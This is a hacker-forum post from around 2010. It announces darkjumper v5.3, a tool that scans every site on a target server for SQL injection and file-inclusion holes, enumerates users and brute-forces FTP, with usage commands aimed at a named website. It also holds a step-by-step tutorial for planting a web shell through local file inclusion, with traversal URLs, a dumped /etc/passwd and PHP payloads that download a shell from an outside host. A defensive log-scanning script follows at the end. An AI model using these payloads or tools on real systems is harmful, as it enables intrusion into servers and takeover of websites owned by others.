DARKJUMPER V5.3 WAS RELEASED, AND TUTORIAL BY GUNSLINGER_
Well, after darkjumper v4.0 was rocked up by my big brother, mywisdom,
mywisdom and I have now developed darkjumper v5.0 (now v5.3) and added more functions to darkjumper.
With this, I am releasing the tool together with a short tutorial on how to use it and what is new in this version…
Toolname : darkjumper.py v5.3
Developed by : mywisdom & gunslinger_ <devilzc0de.com c0der>
Released on : 15 February 2010
Download url : https://sourceforge.net/projects/darkjumper/
Function(s) :
1. User enumeration guessing, based on 4-8 character trial names taken from every site name hosted on the same server
2. Scan for SQL injection, local file inclusion, remote file inclusion and blind SQL injection on every site hosted on the same server
3. CGI and path scanning
4. Portscanning
5. Auto-bruteforcing after user enumeration
6. Autoinjector / auto column finder (MySQL), used when a MySQL error is found
7. Proxy support added
8. Verbosity added
9. IP or proxy checker and GeoIP, useful for checking whether your IP or your proxy works
Additional feature : more fake HTTP user agents
Requirement(s) :
- python : 2.5.x
- perl
Now we go to the tutorial section :
Before scanning : make sure you always clear the log before scanning, by executing clearlog.py
./clearlog.py
All right folks, now we are ready to execute darkjumper and show the options with
./darkjumper.py -h
or
./darkjumper.py --help
and we get output like this…

In this version we have 6 modes. They are :
reverseonly | Only reverse the target, no bug checking
surface | Check for sqli and blind sqli on every web hosted on the same target server
full | Check for sqli, blind, rfi and lfi on every web hosted on the same target server
cgidirs | Scan cgidirs on the target server
enum [number] | Guess possible user enumeration on the server (4-8 chars user enumeration)
portscan [startport]-[endport] | Scan open ports on the target server
OK, here is the full description of each mode…
- reverseonly
In this mode, darkjumper only reverses the target IP. No bugs are checked.
Command is :
./darkjumper.py -t [target] -m reverseonly
Example :

- surface
In this mode, darkjumper reverses the target, then checks for sqli (SQL injection vulnerability) and blind (blind SQL injection vulnerability) on every web hosted on the same target server.
New in this version and later : darkjumper also tries to find the column count automatically when it gets a MySQL type error ! phew !
Command is :
./darkjumper.py -t [target] -m surface
example :

- full
In this mode, darkjumper will reverse the target, then check CGI paths and check for sqli (SQL injection vulnerability), blind (blind SQL injection vulnerability), lfi (local file inclusion) and rfi (remote file inclusion) on every web hosted on the same target server. The autoinjector / auto column finder also works in this mode if we get a MySQL error.
Command is :
./darkjumper.py -t [target] -m full
Example :

- cgidirs
In this mode, darkjumper only checks CGI paths on your target.
Command is :
./darkjumper.py -t [target] -m cgidirs
Example :

- enum
In this mode, darkjumper reverses the target, then guesses possible user enumeration on the server (4-8 chars user enumeration).
Command is :
./darkjumper.py -t [target] -m enum [number]
Example command :
./darkjumper.py -t [target] -m enum 4
Example :

Note : You can enable auto FTP bruteforcing with :
./darkjumper.py -t [target] -m enum [number] -a
(argument -a is for auto FTP bruteforcing)
Example :

- portscan
In this mode, darkjumper only checks for open ports on your target.
Command is :
./darkjumper.py -t [target] -m portscan [startport]-[endport]
Example command :
./darkjumper.py -t localhost -m portscan 15-22
Example :

You can make it verbose by :
./darkjumper.py -t localhost -m portscan 15-22 -v
Example :

And you can check your IP and your proxy.
If you want to check your proxy, your command is
./darkjumper.py -p [proxyaddress:port]
or, if you want to check your own IP address,
./darkjumper.py -c
Want to stop your scan? Simply type this command (note that it kills every running python and perl process on the box, not only darkjumper) :
killall -9 /usr/bin/python ; killall -9 /usr/bin/perl
All right guys, that's it ! Hopefully you enjoy it !!
Don't forget to check for the latest version or report bugs @ https://sourceforge.net/projects/darkjumper/
Coming soon !! darkjumper.py v5.0 just wait and see baby !!
[darkc0de crew ASCII banner - est.2007 forum.darkc0de.com]
Darkjumper.py version 5.0 help module
Developed by : mywisdom & gunslinger_
This tool will try to find every website that host at the same server at your target
Then check for every vulnerability of each website that host at the same server
Vulnerable check including: sqli,blind,lfi and rfi
-----------------------------------------------------------------------------------
Usage : ./darkjumper.py -t [target] -m [option]
Available option :
reverseonly
surface
full
cgidirs
enum [number]
    [number] is 4, 5, 6, 7, 8 in range
portscan [startport]-[endport]
Description:
- reverseonly Only reverse target no checking bug
- surface Reverse target, then checking for sqli and blind sqli on every web that host at the same server
- full Reverse target, then checking for sqli,blind,rfi,lfi on every web that host at the same server [this mode requires longer time,I dont suggest this mode for slow internet connection]
- enum Guessing possible user enumeration on server (4-8 chars user enumeration) If you don't set number this will guesssing default to 8 chars [this mode requires number 4 until 8 for guessing users]
- portscan Scanning open port on server
- cgidirs Scanning cgidirs on the server
----------------------
Sample Usage:
----------------------
Reverseonly mode :
Example : ./darkjumper.py -t www.jasakom.com -m reverseonly
Surface scanning mode :
Example : ./darkjumper.py -t www.jasakom.com -m surface
Full scanning mode:
Example : ./darkjumper.py -t www.jasakom.com -m full
User enumeration mode :
Example : ./darkjumper.py -t www.jasakom.com -m enum 8
Warning ! you must set the number of chars for user enumeration
If you want to set number of chars for user guessing,it should be 4 until 8 ! don't less or greater
CGI directory scanning mode :
Example : ./darkjumper.py -t www.jasakom.com -m cgidirs
Port scanning mode:
Example : ./darkjumper.py -t www.jasakom.com -m portscan 0-80
----------------------------------------------------------
gunslinger@localhost:~/darkjumper$
How to plant a shell through LFI (Local File Inclusion) using the proc/self/environ method
Author : gunslinger_
In this tutorial I will explain how to put a shell on the target server through LFI using the proc/self/environ method.
OK, let's get straight to it…
1. We find a website that is vulnerable to an LFI attack.
example : http://site.com/info.php?file=news.php
2. Let's try replacing "news.php" with "../../../".
example : http://site.com/info.php?file=../../../
Then we get an error like the following…
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
OK, it looks like we have a chance to make the include pull in another file.
Next, let's try to find /etc/passwd.
example : http://site.com/info.php?file=etc/passwd
But we still get an error like the following :
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
What if we go up more directories?
Let's try…
example : http://site.com/info.php?file=../../../../../../../../../etc/passwd
Ahoy, we succeeded in getting the /etc/passwd file, which looks like this :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
3. Let's check whether we can access /proc/self/environ.
Now replace "/etc/passwd" with "/proc/self/environ".
example : http://site.com/info.php?file=../../../../../../../../../proc/self/environ
If you get something like this :
DOCUMENT_ROOT=/home/gunslinger/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com
HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=gunslinger@site.com
SERVER_NAME=www.site.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE= Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80
It turns out we can access proc/self/environ !
If you get a blank page, /proc/self/environ cannot be accessed, or the server may be running a *BSD operating system.
4. Now let's inject malicious code by poisoning the HTTP header. How can we inject it? We can use the Tamper Data add-on for Firefox.
You can download it here : https://addons.mozilla.org/en-US/firefox/addon/966
Open Tamper Data in Firefox, then enter the /proc/self/environ URL from before, "http://site.com/info.php?file=../../../../../../../../../proc/self/environ"
then in the User-Agent field enter the following code :
<?system('wget http://r57.gen.tr/c100.txt -O shell.php');?>
atau
<?exec('wget http://r57.gen.tr/c100.txt -O shell.php');?>
then submit.
5. If we succeeded in injecting the malicious code above, the shell will be at a location like this.
http://site.com/shell.php
happy hacking !
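A defender-side addition (example code, not from gunslinger_'s tutorial or from darkjumper): the request chain described above leaves a distinctive trail in the web server access log, and this Python 3 script flags it, treating a /proc/self/environ read combined with PHP tags in the User-Agent or Referer as the code-execution step. The log lines and client addresses are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines (sample data, not taken from the post).
SAMPLE_LOG = """\
203.0.113.5 - - [15/Feb/2010:10:01:02 +0700] "GET /info.php?file=news.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux) Firefox/3.0.15"
203.0.113.5 - - [15/Feb/2010:10:01:09 +0700] "GET /info.php?file=../../../../../../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux) Firefox/3.0.15"
203.0.113.5 - - [15/Feb/2010:10:01:15 +0700] "GET /info.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 1800 "-" "<?system('id');?>"
198.51.100.7 - - [15/Feb/2010:10:02:00 +0700] "GET /index.php?view=about HTTP/1.1" 200 300 "-" "curl/7.19.7"
"""

# Combined log: ip ident user [time] "method uri proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL_RE = re.compile(r'(\.\./){2,}')        # two or more "../" hops in the decoded URI
SENSITIVE_FILES = ('etc/passwd', 'proc/self/environ')
PHP_TAG_RE = re.compile(r'<\?.*\?>', re.DOTALL)   # "<? ... ?>" PHP code smuggled into a header

def classify(tags):
    """Environ read plus PHP code in a header is the RCE step; any other hit is a probe."""
    if 'php-code-in-header' in tags and 'sensitive-file:proc/self/environ' in tags:
        return 'rce-attempt'
    return 'lfi-probe' if tags else 'benign'

def analyze(line):
    """Parse one combined-format line; None if it does not parse, else a dict with a verdict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = unquote(unquote(m.group('uri'))).lower()   # decode twice: %2F and %252F both become "/"
    tags = []
    if TRAVERSAL_RE.search(uri):
        tags.append('path-traversal')
    tags += ['sensitive-file:' + f for f in SENSITIVE_FILES if f in uri]
    # /proc/self/environ echoes request headers, so PHP code in User-Agent or Referer is the payload.
    if PHP_TAG_RE.search(m.group('ua')) or PHP_TAG_RE.search(m.group('referer')):
        tags.append('php-code-in-header')
    return {'ip': m.group('ip'), 'uri': m.group('uri'), 'tags': tags, 'verdict': classify(tags)}

def scan_log(text):
    """Return every parsed line whose verdict is not benign, in log order."""
    return [r for r in map(analyze, text.splitlines()) if r and r['verdict'] != 'benign']

if __name__ == '__main__':
    for r in scan_log(SAMPLE_LOG):
        print(r['verdict'], r['ip'], r['uri'])
```

The real fix is on the application side: never pass a request parameter to include() unvalidated, but map it to a fixed list of allowed file names instead.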